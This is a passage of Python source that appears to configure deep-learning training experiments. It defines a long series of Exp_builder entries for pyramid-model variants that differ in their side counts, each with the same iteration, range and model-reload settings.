ch032_1side_5__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 10 15 "21" 28 36 45 55
# side6 OK 56
ch032_1side_6__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
